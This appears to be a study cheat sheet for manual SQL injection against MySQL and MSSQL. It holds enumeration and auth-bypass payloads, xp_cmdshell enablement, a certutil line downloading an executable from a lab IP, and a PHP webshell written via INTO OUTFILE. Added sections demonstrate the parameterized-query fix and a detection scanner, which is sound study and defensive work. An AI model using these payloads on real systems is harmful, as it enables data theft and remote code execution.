Easy Manual SQLi

FOR MYSQL

STEP BY STEP

ORDER BY n (increase n until the query errors; the last working n is the column count, which the UNION SELECTs below must match)

UNION SELECT database()
UNION SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
UNION SELECT distinct(db) FROM mysql.db — requires privileges to read mysql.db

#table enumeration
UNION SELECT group_concat(TABLE_NAME) FROM information_schema.tables where table_schema = "DBname"

#column enumeration
UNION SELECT group_concat(COLUMN_NAME) FROM information_schema.columns where table_schema = "DBname" AND table_name = "tablename"

#output (group_concat does not accept *; list the wanted columns explicitly)
UNION SELECT group_concat(col1, ':', col2) FROM DBname.tablename

Useful payloads for auth bypass:

MySQL
AA'or 1=1 in (SELECT @@version) -- -aa


MSSQL
'order by 1 WAITFOR DELAY '0:0:5'--
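The reason the tautology payload above works, and the fix, side by side. This is an added example, not part of the original page: it uses SQLite in memory so it runs offline (the same concatenation sink and the same placeholder fix apply to MySQL and MSSQL through their drivers), and the users table and credentials are constructed sample data.

```python
import sqlite3

# Constructed in-memory user table (sample data, not from any real system).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation: the injection sink."""
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """Binds user input as parameters; the driver never lets it become SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Same shape as the MySQL auth-bypass payload above: close the string
# literal, add a tautology, comment out the password check.
PAYLOAD = "' OR 1=1 -- "

def demo():
    """Run both login variants with valid credentials and with the payload."""
    conn = make_db()
    return {
        "vulnerable_valid": login_vulnerable(conn, "alice", "s3cret"),
        "vulnerable_bypass": login_vulnerable(conn, PAYLOAD, "wrong"),
        "parameterized_valid": login_parameterized(conn, "alice", "s3cret"),
        "parameterized_bypass": login_parameterized(conn, PAYLOAD, "wrong"),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

With concatenation the payload becomes part of the statement and the password comparison is commented away; with a bound parameter the whole payload is compared as a literal username and no row matches. The fix is the placeholder, not escaping or filtering the input.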

MSSQL Command Execution

kali@kali:~$ impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
SQL> EXECUTE sp_configure 'show advanced options', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

'order by 1 EXEC xp_cmdshell "certutil.exe -urlcache -f http://192.168.45.229/test.txt bad.exe";--

Code execution in MySQL

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
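A detection pass over the techniques on this page (schema enumeration through information_schema, reads of mysql.db, WAITFOR DELAY probing, xp_cmdshell enablement, INTO OUTFILE writes), as an added example that is not part of the original page. The log lines are constructed to mimic the payloads above; the rule names and the URL-decoding step are my own assumptions about the log source (a web access log or a SQL query/audit log).

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques listed on this page. Rule names are
# arbitrary labels chosen for this example.
RULES = [
    ("schema_enum", re.compile(r"union\s+(all\s+)?select\b.*\binformation_schema\.", re.I)),
    ("mysql_priv_table", re.compile(r"\bfrom\s+mysql\.db\b", re.I)),
    ("time_based", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("xp_cmdshell_enable", re.compile(r"sp_configure\s*['\"]xp_cmdshell['\"]\s*,\s*1", re.I)),
    ("xp_cmdshell_ref", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]

def classify(text):
    """Return the rule names matched by one log line after URL decoding."""
    decoded = unquote_plus(text)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Return (line_no, rule_names) for every line that matches a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = classify(line)
        if names:
            hits.append((n, names))
    return hits

# Constructed sample lines (not real traffic): lines 1 and 6 are benign,
# the others mimic the payload shapes shown above.
SAMPLE_LOG = [
    "GET /product?id=5 HTTP/1.1",
    "GET /product?id=5+UNION+SELECT+group_concat(TABLE_NAME)+FROM+information_schema.tables+where+table_schema%3D%22shop%22 HTTP/1.1",
    "SQL> EXECUTE sp_configure 'xp_cmdshell', 1;",
    "GET /login?user=%27order+by+1+WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1",
    "GET /search?q=%27+UNION+SELECT+1,null+INTO+OUTFILE+%22/var/www/html/x.php%22+--+// HTTP/1.1",
    "GET /search?q=union HTTP/1.1",
]

if __name__ == "__main__":
    for n, names in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

The matching lines are 2 (schema enumeration), 3 (xp_cmdshell enablement), 4 (time-based probe) and 5 (file write); a lone word such as "union" in a search query is not flagged. On the hardening side, the same four techniques map to known controls: xp_cmdshell is off by default and should stay off, MySQL's secure_file_priv restricts where INTO OUTFILE may write, the application account should not hold the FILE privilege or read access to mysql.db, and parameterized queries remove the injection point that every payload on this page depends on.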
